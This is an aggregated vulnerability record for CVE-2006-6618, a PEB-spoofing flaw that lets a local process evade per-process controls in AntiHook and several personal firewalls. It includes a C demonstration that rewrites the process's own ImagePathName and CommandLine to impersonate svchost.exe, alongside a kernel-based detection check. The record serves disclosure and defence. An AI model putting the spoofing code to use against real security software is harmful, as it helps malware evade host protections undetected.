ID

VAR-200612-0204


CVE

CVE-2006-6618


TITLE

AntiHook - Desktop vulnerability that lets a process evade the product's per-process controls

Trust: 0.8

sources: JVNDB: JVNDB-2006-001768

DESCRIPTION

AntiHook 3.0.0.23 - Desktop relies on the Process Environment Block (PEB) to identify a process, which allows local users to bypass the product's controls on a process by spoofing the (1) ImagePathName, (2) CommandLine, and (3) WindowTitle fields in the PEB. The same weakness affects several other vendors' personal firewalls and HIPS (host-based intrusion prevention systems): they identify a process from user-mode process information that the process itself can rewrite. Personal firewalls, HIPS and similar security software that enforce policy on a per-process basis must be able to identify the process attempting a privileged operation; an attacker who can already run code on the host can make an arbitrary malicious program appear to be a trusted process, pass the security check under that identity, and operate undetected on the affected computer. The following software is vulnerable, and other versions may also be affected: InfoProcess AntiHook 3.0.0.23; AVG Anti-Virus plus Firewall 7.5.431; Comodo Personal Firewall 2.3.6.81; Filseclab Personal Firewall 3.0.0.8686; Look 'n' Stop Personal Firewall 2.05p2; Symantec Sygate Personal Firewall 5.6.2808.

Trust: 1.98

sources: NVD: CVE-2006-6618 // JVNDB: JVNDB-2006-001768 // BID: 21615 // VULHUB: VHN-22726
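The following C program is an added worked example written for this page; it is not matousec's ex-coat proof of concept and not code from any vendor listed above. It demonstrates the weakness the description names: a checker that identifies a process from the ImagePathName and CommandLine fields of its RTL_USER_PROCESS_PARAMETERS (reached through the PEB) is fooled as soon as the process rewrites those fields, while a checker that asks the kernel for the image path is not, and the disagreement between the two is itself a detectable signal. The svchost.exe allow-list entry, the evil.exe path and the spoofed strings are constructed for the demonstration. On Windows the program modifies its own PEB and calls QueryFullProcessImageNameW; on other hosts it compiles against stand-in type definitions and a constructed parameter block so the comparison logic can still be run. WindowTitle, the advisory's third field, is left out because the public winternl.h does not expose it.

```c
/* peb_identity_demo.c: added example, not matousec's ex-coat PoC or any vendor's code.
 * Shows why identifying a process from its PEB is unsafe (CVE-2006-6618) and what a
 * hardened checker compares instead. On Windows it rewrites the running process's own
 * RTL_USER_PROCESS_PARAMETERS and asks the kernel for the real image path; elsewhere it
 * compiles against stand-in types and a constructed block so the same logic still runs.
 * Build: cl /W4 peb_identity_demo.c   or   gcc -std=c99 -Wall peb_identity_demo.c */
#if defined(_WIN32) && !defined(_WIN32_WINNT)
#define _WIN32_WINNT 0x0600  /* QueryFullProcessImageNameW is Vista and later */
#endif
#include <stdio.h>
#include <string.h>
#include <wchar.h>
#include <wctype.h>
#ifdef _WIN32
#include <windows.h>
#include <winternl.h>  /* public PEB / RTL_USER_PROCESS_PARAMETERS (ImagePathName, CommandLine) */
#else
typedef unsigned short USHORT;
typedef wchar_t WCHAR, *PWSTR;
typedef struct { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING;
/* Only the fields this demo touches. WindowTitle, the advisory's third spoofable field,
   lies further into the real structure and is not exposed by the public winternl.h. */
typedef struct { UNICODE_STRING ImagePathName, CommandLine; }
    RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
#endif
#define PATH_CAP 260

/* trusted_by_peb: verdict of a checker that reads the PEB (the vulnerable design);
   trusted_by_kernel: verdict using the kernel's image path; spoof_detected: they disagree. */
typedef struct { int trusted_by_peb, trusted_by_kernel, spoof_detected; } check_result;
typedef struct { check_result before, after; } demo_result;

static int wcs_ieq(const WCHAR *a, const WCHAR *b) {  /* Win32 paths are case-insensitive */
    for (; *a && *b; a++, b++) if (towlower((wint_t)*a) != towlower((wint_t)*b)) return 0;
    return *a == *b;
}

/* Length is in bytes and excludes the terminator, exactly as RtlInitUnicodeString sets it. */
static void set_unicode_string(UNICODE_STRING *us, PWSTR s) {
    us->Buffer = s;
    us->Length = (USHORT)(wcslen(s) * sizeof(WCHAR));
    us->MaximumLength = (USHORT)(us->Length + sizeof(WCHAR));
}

/* PEB strings need not be NUL-terminated: copy Length bytes and terminate ourselves. */
static void unicode_string_to_wcs(const UNICODE_STRING *us, WCHAR *out, size_t cap) {
    size_t n = us->Buffer ? us->Length / sizeof(WCHAR) : 0;
    if (n >= cap) n = cap - 1;
    if (n) memcpy(out, us->Buffer, n * sizeof(WCHAR));
    out[n] = L'\0';
}

/* The attack: repoint the process's own parameter block at chosen strings. Anything that
   identifies the process from these fields, locally or via ReadProcessMemory, is fooled. */
static void spoof_process_parameters(PRTL_USER_PROCESS_PARAMETERS pp, PWSTR image, PWSTR cmdline) {
    set_unicode_string(&pp->ImagePathName, image);
    set_unicode_string(&pp->CommandLine, cmdline);
}

/* Both checkers side by side. Path equality is the identification model in the advisory;
   a production HIPS would additionally verify the image's signature or hash. */
static check_result evaluate_process(const RTL_USER_PROCESS_PARAMETERS *pp,
                                     const WCHAR *kernel_image, const WCHAR *trusted_image) {
    check_result r; WCHAR self_reported[PATH_CAP];
    unicode_string_to_wcs(&pp->ImagePathName, self_reported, PATH_CAP);
    r.trusted_by_peb    = wcs_ieq(self_reported, trusted_image);
    r.trusted_by_kernel = wcs_ieq(kernel_image, trusted_image);
    r.spoof_detected    = !wcs_ieq(self_reported, kernel_image);
    return r;
}

/* Evaluate, spoof, evaluate again. On Windows the real PEB is modified and then restored. */
demo_result run_spoof_demo(void) {
    static WCHAR fake_image[] = L"C:\\Windows\\System32\\svchost.exe";
    static WCHAR fake_cmd[]   = L"C:\\Windows\\System32\\svchost.exe -k netsvcs";
    const WCHAR *trusted = L"C:\\Windows\\System32\\svchost.exe";  /* assumed allow-list entry */
    WCHAR kernel_image[PATH_CAP]; demo_result d;
#ifdef _WIN32
    PRTL_USER_PROCESS_PARAMETERS pp = NtCurrentTeb()->ProcessEnvironmentBlock->ProcessParameters;
    UNICODE_STRING saved_image = pp->ImagePathName, saved_cmd = pp->CommandLine; DWORD cap = PATH_CAP;
    /* Answered from the kernel's record of the image, not from memory the process can write. */
    if (!QueryFullProcessImageNameW(GetCurrentProcess(), 0, kernel_image, &cap)) kernel_image[0] = L'\0';
#else
    /* Constructed stand-in: a parameter block that honestly reports a suspicious binary. */
    static WCHAR real_image[] = L"C:\\Users\\victim\\Downloads\\evil.exe";
    static RTL_USER_PROCESS_PARAMETERS block;
    PRTL_USER_PROCESS_PARAMETERS pp = &block;
    set_unicode_string(&block.ImagePathName, real_image);
    set_unicode_string(&block.CommandLine, real_image);
    wcscpy(kernel_image, real_image);
#endif
    d.before = evaluate_process(pp, kernel_image, trusted);
    spoof_process_parameters(pp, fake_image, fake_cmd);
    d.after = evaluate_process(pp, kernel_image, trusted);
#ifdef _WIN32
    pp->ImagePathName = saved_image; pp->CommandLine = saved_cmd;
#endif
    return d;
}

int main(void) {
    demo_result d = run_spoof_demo();
    wprintf(L"before spoof: peb=%d kernel=%d mismatch=%d\n",
            d.before.trusted_by_peb, d.before.trusted_by_kernel, d.before.spoof_detected);
    wprintf(L"after spoof:  peb=%d kernel=%d mismatch=%d\n",
            d.after.trusted_by_peb, d.after.trusted_by_kernel, d.after.spoof_detected);
    return 0; }
```

Run from any binary other than svchost.exe, the first line prints peb=0 kernel=0 mismatch=0 and the second prints peb=1 kernel=0 mismatch=1: after the rewrite the PEB-reading checker accepts the process as svchost.exe, the kernel-based checker still rejects it, and the mismatch flag fires. The non-Windows build produces the same values against the constructed block. A checker that reads the target's PEB over ReadProcessMemory is in exactly the position of the PEB-reading verdict here, which is why the fix for this class of issue is to take the process identity from the kernel rather than from the process.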

AFFECTED PRODUCTS

vendor:symantecmodel:sygate personal firewallscope:eqversion:5.6.2808

Trust: 1.9

vendor:infoprocessmodel:antihookscope:eqversion:3.0.23

Trust: 1.3

vendor:filseclabmodel:personal firewallscope:eqversion:3.0.8686

Trust: 1.3

vendor:comodomodel:personal firewallscope:eqversion:2.3.6.81

Trust: 1.3

vendor:avgmodel:antivirus plus firewallscope:eqversion:7.5.431

Trust: 1.0

vendor:soft4evermodel:look n stopscope:eqversion:2.05p2

Trust: 1.0

vendor:infoprocessmodel:antihookscope:eqversion:3.0.0.23

Trust: 0.8

vendor:look 'n' stopmodel:look 'n' stop 2.05p2scope: - version: -

Trust: 0.3

vendor:avgmodel:anti-virus plus firewallscope:eqversion:7.5.431

Trust: 0.3

sources: BID: 21615 // JVNDB: JVNDB-2006-001768 // CNNVD: CNNVD-200612-391 // NVD: CVE-2006-6618

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2006-6618
value: HIGH

Trust: 1.0

NVD: CVE-2006-6618
value: HIGH

Trust: 0.8

CNNVD: CNNVD-200612-391
value: HIGH

Trust: 0.6

VULHUB: VHN-22726
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2006-6618
severity: HIGH
baseScore: 7.2
vectorString: AV:L/AC:L/AU:N/C:C/I:C/A:C
accessVector: LOCAL
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 3.9
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-22726
severity: HIGH
baseScore: 7.2
vectorString: AV:L/AC:L/AU:N/C:C/I:C/A:C
accessVector: LOCAL
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 3.9
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: VULHUB: VHN-22726 // JVNDB: JVNDB-2006-001768 // CNNVD: CNNVD-200612-391 // NVD: CVE-2006-6618

PROBLEMTYPE DATA

problemtype:NVD-CWE-Other

Trust: 1.0

sources: NVD: CVE-2006-6618

THREAT TYPE

local

Trust: 0.9

sources: BID: 21615 // CNNVD: CNNVD-200612-391

TYPE

access validation error

Trust: 0.6

sources: CNNVD: CNNVD-200612-391

CONFIGURATIONS

sources: JVNDB: JVNDB-2006-001768

PATCH

title:Top Pageurl:http://www.infoprocess.com.au/AntiHook.php

Trust: 0.8

sources: JVNDB: JVNDB-2006-001768

EXTERNAL IDS

db:NVDid:CVE-2006-6618

Trust: 2.5

db:BIDid:21615

Trust: 2.0

db:JVNDBid:JVNDB-2006-001768

Trust: 0.8

db:CNNVDid:CNNVD-200612-391

Trust: 0.7

db:BUGTRAQid:20061215 BYPASSING PROCESS IDENTIFICATION OF SEVERAL PERSONAL FIREWALLS AND HIPS

Trust: 0.6

db:VULHUBid:VHN-22726

Trust: 0.1

sources: VULHUB: VHN-22726 // BID: 21615 // JVNDB: JVNDB-2006-001768 // CNNVD: CNNVD-200612-391 // NVD: CVE-2006-6618

REFERENCES

url:http://www.securityfocus.com/bid/21615

Trust: 1.7

url:http://www.matousec.com/downloads/windows-personal-firewall-analysis/ex-coat.zip

Trust: 1.7

url:http://www.matousec.com/info/advisories/bypassing-process-identification-serveral-personal-firewalls-hips.php

Trust: 1.7

url:http://www.securityfocus.com/archive/1/454522/100/0/threaded

Trust: 1.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-6618

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2006-6618

Trust: 0.8

url:http://www.securityfocus.com/archive/1/archive/1/454522/100/0/threaded

Trust: 0.6

url:http://www.infoprocess.com.au/antihook.php

Trust: 0.3

url:http://www.grisoft.com/

Trust: 0.3

url:http://www.comodo.com/

Trust: 0.3

url:http://www.google.ca/url?sa=t&ct=res&cd=1&url=http%3a%2f%2fwww.filseclab.com%2feng%2fproducts%2ffirewall.htm&ei=d_6crfdcapuwnqptjcb_&usg=__uqizxyyvwb4dlpaaogel8nftkja=&sig2=riufvoqmxrfqyl4h1bsrzq

Trust: 0.3

url:http://www.symantec.com

Trust: 0.3

url:http://www.google.ca/url?sa=t&ct=res&cd=1&url=http%3a%2f%2fwww.looknstop.com%2f&ei=m_6crfl8n6cunqp5wef7&usg=__ufqwvzzztduykujwzxq2euu_xna=&sig2=1vrohasxv2wrxkwcut7fua

Trust: 0.3

url:/archive/1/454522

Trust: 0.3

sources: VULHUB: VHN-22726 // BID: 21615 // JVNDB: JVNDB-2006-001768 // CNNVD: CNNVD-200612-391 // NVD: CVE-2006-6618

CREDITS

Matousec http://www.matousec.com/

Trust: 0.6

sources: CNNVD: CNNVD-200612-391

SOURCES

db:VULHUBid:VHN-22726
db:BIDid:21615
db:JVNDBid:JVNDB-2006-001768
db:CNNVDid:CNNVD-200612-391
db:NVDid:CVE-2006-6618

LAST UPDATE DATE

2025-04-10T23:18:17.405000+00:00


SOURCES UPDATE DATE

db:VULHUBid:VHN-22726date:2018-10-17T00:00:00
db:BIDid:21615date:2006-12-15T21:18:00
db:JVNDBid:JVNDB-2006-001768date:2012-06-26T00:00:00
db:CNNVDid:CNNVD-200612-391date:2007-02-06T00:00:00
db:NVDid:CVE-2006-6618date:2025-04-09T00:30:58.490

SOURCES RELEASE DATE

db:VULHUBid:VHN-22726date:2006-12-18T00:00:00
db:BIDid:21615date:2006-12-15T00:00:00
db:JVNDBid:JVNDB-2006-001768date:2012-06-26T00:00:00
db:CNNVDid:CNNVD-200612-391date:2006-12-18T00:00:00
db:NVDid:CVE-2006-6618date:2006-12-18T11:28:00